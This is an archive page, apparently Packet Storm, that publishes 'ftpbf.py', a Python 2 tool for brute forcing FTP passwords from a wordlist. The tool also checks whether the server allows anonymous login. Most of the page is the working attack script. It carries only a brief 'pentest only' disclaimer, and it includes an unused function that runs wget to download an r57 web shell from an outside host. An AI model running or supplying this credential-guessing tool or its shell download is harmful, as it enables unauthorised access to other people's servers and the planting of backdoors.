what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FTP Brute Forcing Tool 0.1

FTP Brute Forcing Tool 0.1
Posted Mar 16, 2011
Authored by baltazar

This is a simple python script to brute force ftpd.

tags | cracker, python
SHA-256 | 75f9adacc2779c88694791ef3852491c0f039afccdbe8c1600dbf7fde13417ba

FTP Brute Forcing Tool 0.1

Change Mirror Download
#!/usr/bin/python
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname : ftpbf.py
# Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version : 0.1
# About :
# Greetz for rsauron and low1z, great python coders
# greetz for d3hydr8, qk, marezzi, StRoNiX, t0r3x, fx0, TraXdata, v0da and all members of ex darkc0de.com, ljuska.org and rev3rse.org
#
#
# Example of use : ./ftpbf.py -t ftp.server.com -u baltazar -w words.txt
# After scanning check ftpbf.txt for more info (in next version)

import sys, os, time
from ftplib import FTP

if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)

R = "\033[31m";
G = "\033[32m";



def logo():
print G+"\n|---------------------------------------------------------------|"
print "| |"
print "| b4ltazar[@]gmail[dot]com |"
print "| 02/2011 ftpbf.py v.0.1 |"
print "| FTP Brute Forcing Tool |"
print "| |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s\n" % time.strftime("%X")

def help():
logo()
print R+"-t, --target ip/hostname <> Our target"
print "-u, --user user <> Our user"
print "-w, --wordlist wordlist <> wordlist path"
print "-h, --help help <> print this help"
print "ex: ./ftpbf -t ftp.server.com -u baltazar -w passwords.txt"
sys.exit(1)

for arg in sys.argv:
if arg.lower() == '-t' or arg.lower() == '--target':
hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-u' or arg.lower() == '--user':
user = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
help()
elif len(sys.argv) <= 1:
help()

logo()



def bf(p):
sys.stdout.write("\r[!]Checking : %s " % (p))
sys.stdout.flush()
try:
ftp = FTP(hostname)
ftp.login(user, p)
ftp.retrlines('list')
ftp.quit()
print R+"\n[!] w00t,w00t!!! We did it ! "
print "[+] Target : ",hostname, ""
print "[+] User : ",user, ""
print "[+] Password : ",p, ""
sys.exit(1)
except Exception, e:
pass
except KeyboardInterrupt:
print "\n[-] Exiting ...\n"
sys.exit(1)
def anon():
try:
print "\n[!] Checking for anonymous login\n"
ftp = FTP(hostname)
ftp.login()
ftp.retrlines('LIST')
print R+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"

ftp.quit()
except Exception, e:
print G+"\n[-] Anonymous login unsuccessful...\n"
pass
def shell():
os.system("wget http://hmvhotels.com/unaesthetically/r57.txt")
if commands.getoutput("ls") != "r57.txt":
print "Sorry cant upload shell"
else:
print "w00t,w00t!!! Shell up"

print "[!] BruteForcing target ..."
anon()

try:
passwords = open(wordlist, "r")
pwd = passwords.readlines()
count = 0
while count < len(pwd):
pwd[count] = pwd[count].strip()
count +=1
except(IOError):
print "\n[-] Check your wordlist path\n"
sys.exit(1)

print G+"\n[+] Loaded:",len(pwd),"passwords"
print "[+] Target:",hostname
print "[+] User:",user
print "[+] Guessing...\n"
for p in pwd:
bf(p.replace("\n",""))
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close